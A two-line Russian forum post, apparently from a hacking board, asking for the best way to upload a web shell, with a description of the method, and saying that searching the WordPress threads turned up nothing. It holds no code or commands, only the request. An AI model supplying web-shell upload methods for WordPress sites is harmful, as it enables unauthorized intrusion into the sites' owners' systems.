Каким способ лучше залить шелл (описание способа) ?

Облазил все темы с WordPress и нужную мне информацию не нашел... :eek: